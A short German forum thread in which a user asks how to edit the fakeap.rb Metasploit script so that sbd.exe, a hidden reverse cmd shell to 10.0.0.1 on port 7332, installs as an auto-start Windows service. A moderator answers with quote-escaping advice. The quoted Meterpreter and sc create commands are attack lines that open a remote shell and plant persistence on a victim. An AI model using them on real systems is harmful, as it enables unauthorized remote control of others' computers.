Results 1 to 3 of 3

Thread: Frage zu fakeap.rb MSF und Ruby

  1. #1
    Member
    Join Date
    Jan 2010
    Posts
    81

    Default Frage zu fakeap.rb MSF und Ruby

    Hi..
    Bin schon seit 2 tagegen am rumprobieren, und verzweifle jezt fast..
    Folgendes, ich habe "g0tmi1k FakeAP script getestet, alles i.o

    Ich würde aber gerne im fakeap.rb script, den code so ändern das sbd.exe als Dienst Startet, der normale code im fakeap.rb ist:
    client.sys.process.execute("C://WINDOWS//sbd.exe -q -r 10 -k g0tmi1k -e cmd -p 7332 10.0.0.1", nil, {'Hidden' => true})

    ich möchte ihn so ändern das er mit sc.exe als dienst gestartet wird, der befehl für die CMD ist so:
    sc create systemshell binpath= "cmd /C C:\sbd.exe -q -r 10 -k g0tmi1k -e cmd -p 7332 10.0.0.1" start= auto

    nun habe ich alle möglichen varianten probiert wie ich die client.sys.process.execute ändern kann das sbd.exe als Dienst gestartet wird, ein beispiel ist so:
    client.sys.process.execute("C://sc.exe create sytemshell binpath= cmd /C \%windir%\sbd.exe -q -r 10 -k g0tmi1k -e cmd -p 7332 10.0.0.1 start= auto", nil, {'Hidden' => true})

    das problem ist das ich 2x "" in die Zeile habe...
    habe aber schon fast alle varianten ausprobiert.. aber nichts ging bis jezt, hoffe das da jemand eine tip geben kann wie ich die zeile richtig kombiniere..



    cheers ozzy

  2. #2
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    Hast du es schonmal probiert, die "inneren" Anfuehrungszeichen mit einem vorangehenden \ zu terminieren?
    Tiocfaidh ár lá

  3. #3
    Member
    Join Date
    Jan 2010
    Posts
    81

    Default

    Hi KMDave..

    ..und das sagst du jezt...! ;-)
    ....nein spass, danke für deine richtige antwort, hätte ich nur etwas früher gefragt.

    thx

    ozzy

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •